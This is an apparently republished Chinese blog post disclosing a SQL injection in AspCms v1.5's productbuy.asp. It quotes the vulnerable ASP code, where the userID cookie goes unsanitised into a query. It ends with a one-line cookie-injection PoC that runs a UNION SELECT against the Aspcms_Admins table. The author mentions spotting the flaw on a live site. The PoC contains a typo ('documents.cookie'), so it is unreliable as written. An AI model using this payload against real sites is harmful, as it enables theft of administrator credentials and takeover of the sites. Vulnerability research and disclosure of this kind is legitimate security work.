当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

AspCms_v1.5_20110517 SQL注射

时间:2015/5/19 18:36:50 作者:平凡之路 来源:xuhantao.com 浏览:

前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注入漏洞。。。。。。。

废话不多说,看代码: 搜狗电脑知识技巧

 

<%

if action = "buy" then

    addOrder()

else

    echoContent()

end if

 

……略过

 

Sub echoContent()

    dim id

    id=getForm("id","get")

    

    if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 

    

    dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")

    dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

    Dim templatePath,tempStr

    templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"

 

    set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")

    selectproduct=rsObj(0)

    

    Dim linkman,gender,phone,mobile,email,qq,address,postcode

    if isnul(rCookie("loginstatus")) thenwCookie"loginstatus",0

    if rCookie("loginstatus")=1 then

        set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

        linkman=rsObj("truename")

        gender=rsObj("gender")

        phone=rsObj("phone")

        mobile=rsObj("mobile")

        email=rsObj("email")

        qq=rsObj("qq")

        address=rsObj("address")

        postcode=rsObj("postcode")

    else 

        gender=1

    end if

    rsObj.close()

       

    with templateObj 

        .content=loadFile(templatePath)    

        .parseHtml()

        .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

        .content=replaceStr(.content,"[aspcms:linkman]",linkman)        

        .content=replaceStr(.content,"[aspcms:gender]",gender)        

        .content=replaceStr(.content,"[aspcms:phone]",phone)        

        .content=replaceStr(.content,"[aspcms:mobile]",mobile)        

        .content=replaceStr(.content,"[aspcms:email]",email)            

        .content=replaceStr(.content,"[aspcms:qq]",qq)            

        .content=replaceStr(.content,"[aspcms:address]",address)            

        .content=replaceStr(.content,"[aspcms:postcode]",postcode)    

        .parseCommon()         

        echo .content 

    end with

    set templateobj =nothing : terminateAllObjects

End Sub

漏洞很明显,没啥好说的

poc:

 

javascript:alert(documents.cookie="loginstatus=" + escape("1"));alert(documents.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1